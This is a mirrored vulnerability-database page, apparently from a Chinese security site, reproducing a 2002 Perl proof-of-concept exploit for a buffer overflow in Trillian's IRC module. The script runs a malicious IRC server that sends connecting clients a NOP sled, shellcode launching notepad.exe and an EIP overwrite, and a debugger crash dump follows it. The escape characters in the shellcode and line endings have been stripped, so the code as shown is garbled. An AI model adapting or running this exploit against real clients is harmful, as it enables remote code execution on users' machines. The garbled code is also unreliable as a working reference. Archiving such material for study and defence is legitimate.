Trillian 0.x IRC Module – Remote Buffer Overflow

Trillian 0.x IRC Module – Remote Buffer Overflow

漏洞ID 1053607 漏洞类型
发布时间 2002-07-31 更新时间 2002-07-31
图片[1]-Trillian 0.x IRC Module – Remote Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-Trillian 0.x IRC Module – Remote Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21675
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/5373/info

A buffer overflow condition has been reported in the Trillian IRC module. The condition is due to insecure handling of data extracted from server responses. An attacker in control of a malicious server may exploit vulnerable clients who have connected. 

#!/usr/local/bin/perl
#---------------------sicillian.pl------------------------
#- Proof of concept exploit for trillians irc module.
#- Tested on trillian 0.73 but i suspect all version
#- prior maybe exploited as well.
#-
#- John C. Hennessy (Information security analyst)
#------------------------------------------------------

use Socket;

$|=1;

        #egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "xEBx27x8Bx34x24x33xC9x33xD2xB2";
$egg .= "x0Bx03xF2x88x0Ex2BxF2xB8xAFxA7";
$egg .= "xE6x77xB1x05xB2x04x2BxE2x89x0C";
$egg .= "x24x2BxE2x89x34x24xFFxD0x90xEB";
$egg .= "xFDxE8xD4xFFxFFxFF";
$egg .= "notepad.exe";

$buf = "x90" x 174;
$buf .= $egg;
$buf .= "x41x41x41x41";


my $host = inet_aton("127.0.0.1");
my $proto = getprotobyname("tcp");
my $port = 6667;

my $add_port = sockaddr_in($port,$host);

my $ser_sock = socket(SOCKET,PF_INET,SOCK_STREAM,$proto) or die "Cannot open
Socket: $!";

bind(SOCKET,$add_port) or die "nCould't bind to port $port : $!n ";

my $connection = listen(SOCKET,5) or die "Could't listen on $port: $! n";

while(accept(CLIENT,SOCKET)){
print CLIENT "PING :1986115026rn001 :irc.random.org trillian :$bufrn";
}
close(SOCKET);


##########Snippet from debugger##########
# Access violation - code c0000005 (first chance)
# eax=00000000 ebx=022738c8 ecx=100446d0 edx=00000901 esi=02274e60
edi=022738c8
# eip=41414141 esp=0012ca58 ebp=01283718 iopl=0         nv up ei pl nz na po
nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000 efl=00010206
# 41414141 ??               ???
#####################################

相关推荐: Alcatel OmniPCX FTP服务提升根特权漏洞

Alcatel OmniPCX FTP服务提升根特权漏洞 漏洞ID 1204232 漏洞类型 未知 发布时间 2002-05-31 更新时间 2002-05-31 CVE编号 CVE-2002-0293 CNNVD-ID CNNVD-200205-133 漏洞…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享